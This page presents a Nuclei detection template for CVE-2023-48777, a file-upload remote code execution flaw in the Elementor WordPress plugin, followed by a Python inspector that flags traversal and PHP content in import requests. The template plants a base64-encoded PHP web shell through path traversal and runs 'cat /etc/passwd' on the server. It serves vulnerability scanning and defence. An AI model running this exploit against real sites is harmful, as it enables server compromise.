WordPress Elementor 3.18.1 - File Upload/Remote Code Execution
ID: CVE-2023-48777
Severity: critical
Author: DhiyaneshDK
Tags: cve,cve2023,elementor,file-upload,intrusive,rce,wpscan,wordpress,wp-plugin,authenticated
Description
The plugin is vulnerable to Remote Code Execution via file upload via the template import functionality, allowing authenticated attackers, with contributor-level access and above, to upload files and execute code on the server.
YAML Source
id: CVE-2023-48777

info:
  name: WordPress Elementor 3.18.1 - File Upload/Remote Code Execution
  author: DhiyaneshDK
  severity: critical
  description: |
    The plugin is vulnerable to Remote Code Execution via file upload via the template import functionality, allowing authenticated attackers, with contributor-level access and above, to upload files and execute code on the server.
  remediation: Fixed in 3.18.2
  reference:
    - https://wpscan.com/vulnerability/a6b3b14c-f06b-4506-9b88-854f155ebca9/
    - https://patchstack.com/database/vulnerability/elementor/wordpress-elementor-plugin-3-18-0-arbitrary-file-upload-vulnerability?_s_id=cve
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H
    cvss-score: 9.9
    cve-id: CVE-2023-48777
    cwe-id: CWE-434
    epss-score: 0.00054
    epss-percentile: 0.21518
    cpe: cpe:2.3:a:elementor:website_builder:*:*:*:*:wordpress:*:*:*
  metadata:
    verified: true
    max-request: 4
    framework: wordpress
    publicwww-query: "/wp-content/plugins/elementor/"
    product: website_builder
    vendor: elementor
  tags: cve,cve2023,elementor,file-upload,intrusive,rce,wpscan,wordpress,wp-plugin,authenticated

variables:
  filename: "{{rand_base(6)}}"
  payload: '{"import_template":{"action":"import_template","data":{"fileName":"/../../../../{{filename}}.php","fileData":"PD9waHAgZWNobyBzeXN0ZW0oJF9HRVRbJ2NtZCddKTsgPz4="}}}'

http:
  - raw:
      - |
        POST /wp-login.php HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        log={{username}}&pwd={{password}}&wp-submit=Log+In

      - |
        GET /wp-admin/post.php?post=1&action=elementor HTTP/1.1
        Host: {{Hostname}}

      - |
        POST /wp-admin/admin-ajax.php HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        actions={{url_encode(payload)}}&_nonce={{nonce}}&editor_post_id=1&initial_document_id=1&action=elementor_ajax

      - |
        GET /wp-content/{{filename}}.php?cmd=cat+/etc/passwd HTTP/1.1
        Host: {{Hostname}}

    matchers:
      - type: dsl
        dsl:
          - "regex('root:.*:0:0:', body_4)"
          - "status_code_4 == 200"
        condition: and

    extractors:
      - type: regex
        internal: true
        name: nonce
        part: body
        group: 1
        regex:
          - 'admin\\\/admin\-ajax\.php","nonce":"([0-9a-z]+)"'
# digest: 490a0046304402205b9e17dfd046edb0499a7edcf146a216af74e00790db041011fad6534f3c349702205001912dd2d0c3fbaabfd273a7d22740cfc316bcbd6b51c58f4dd8304bc8c698:922c64590222798bb761d5b6d8e72950

Guide to check the vulnerabilities
This template detects CVE-2023-48777 and is run with the Nuclei scanner against a target URL. It is tagged authenticated and intrusive: the first request logs in with the {{username}} and {{password}} variables, so those must be supplied (for example with nuclei's -var option), and on a vulnerable site the third request actually writes a PHP file under wp-content, which should be removed after testing.
$ nuclei -u "URL" -t "http/cves/2023/CVE-2023-48777.yaml"
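As an added, defender-side example that is not part of the Nuclei template above: a small Python inspector for the admin-ajax.php request body the template's third request sends, flagging an import_template action whose fileName carries path separators or traversal or does not name a .json template, or whose base64 fileData decodes to PHP. The sample bodies, the nonce value and the 'marker' PHP string are constructed; the function only returns findings and sends nothing.

```python
import base64
import json
from urllib.parse import parse_qs, quote

def _b64_decode_lenient(data: str) -> bytes:
    """Decode possibly unpadded base64; return b'' if it is not base64 at all."""
    try:
        return base64.b64decode(data + "=" * (-len(data) % 4), validate=False)
    except (ValueError, TypeError):
        return b""

def inspect_elementor_ajax(body: str) -> list[str]:
    """Return findings for one form-encoded POST body sent to admin-ajax.php.
    Only action=elementor_ajax with an import_template sub-action is examined."""
    params = parse_qs(body, keep_blank_values=True)
    if params.get("action", [""])[0] != "elementor_ajax":
        return []
    try:
        actions = json.loads(params.get("actions", ["{}"])[0])
    except json.JSONDecodeError:
        actions = None
    if not isinstance(actions, dict):
        return ["actions parameter is not a JSON object"]
    findings = []
    for action_id, entry in actions.items():
        if not isinstance(entry, dict) or entry.get("action") != "import_template":
            continue
        data = entry.get("data") or {}
        file_name = str(data.get("fileName", ""))
        if any(sep in file_name for sep in ("..", "/", "\\")):
            findings.append(f"{action_id}: traversal/path separators in fileName {file_name!r}")
        if not file_name.lower().endswith(".json"):
            findings.append(f"{action_id}: fileName {file_name!r} is not a .json template")
        decoded = _b64_decode_lenient(str(data.get("fileData", ""))).lower()
        if b"<?php" in decoded or b"<?=" in decoded:
            findings.append(f"{action_id}: fileData decodes to content with a PHP open tag")
    return findings

def _form_body(actions: dict) -> str:
    """Constructed admin-ajax body in the shape of the template's third request."""
    return ("actions=" + quote(json.dumps(actions, separators=(",", ":")))
            + "&_nonce=0123456789&editor_post_id=1&initial_document_id=1&action=elementor_ajax")

# Constructed sample bodies (not captured traffic): a normal import and a traversal/PHP one.
BENIGN_BODY = _form_body({"import_template": {"action": "import_template", "data": {
    "fileName": "landing-page.json",
    "fileData": base64.b64encode(b'{"version":"0.4","content":[]}').decode()}}})
SUSPICIOUS_BODY = _form_body({"import_template": {"action": "import_template", "data": {
    "fileName": "/../../../../abc123.php",
    "fileData": base64.b64encode(b"<?php echo 'marker'; ?>").decode()}}})
```

The same check can run inside a WAF rule or a request-logging middleware in front of admin-ajax.php, where the POST body is still available.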